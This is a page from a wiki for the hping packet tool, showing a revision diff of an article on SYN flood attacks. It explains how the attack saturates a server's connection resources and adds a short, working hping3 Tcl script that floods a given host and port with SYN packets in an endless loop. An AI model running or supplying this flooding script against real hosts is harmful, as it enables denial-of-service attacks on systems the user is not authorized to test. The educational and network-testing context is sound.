hping wiki

Differences for page SYN flood

Current version compared with version Sun Sep 19 15:47:43 GMT 2004

...
- The SYN flood is an attack that today can be defined "old", but the general idea is still working.
- The goal of this attack is to send TCP connections requests faster than a machine can process them
- in order to saturate the resources, and let the machine unable to accept more connections.
+ !!The SYN flood is an attack that can nowadays be defined as archaic, although the general idea can still work (in a DDoS, for instance).
+ 
+ 
+ The goal of this attack is to send TCP connection requests faster than a machine can process them 
+ in order to saturate the resources and prevent the machine from accepting any more connections.
  Actually the attacker does not create a whole TCP connection, but just send a SYN packet
  (the first packet required to start a TCP connetion), spoofing at random the source IP address,
  so from the attacker point of view the resource to perform the attack is only the bandwidth
...
- + ----
+ 
+ 
+ This wiki is nothing without code, so here we go (as .htcl file).....
+ 
+  # (c) GPL2 fluxist(at)gmail.com
+  # Usage; hping3 exec ./synflood.htcl <hostname> <dstport>
+ 
+  if {$argc < 2} {
+    puts "Required arguments: hostname dstport"
+    exit 1
+    }
+ 
+  foreach {hostname port} $argv break
+  set srcport 14000
+  set target [hping resolve $hostname]
+  set myaddr [hping outifa $target]
+ 
+  puts "Synflooding $target..."
+ 
+  while {1} {
+    hping send "ip(saddr=$myaddr,daddr=$target)+tcp(sport=$srcport,dport=$port,flags=s)"
+    }

The following is the old page content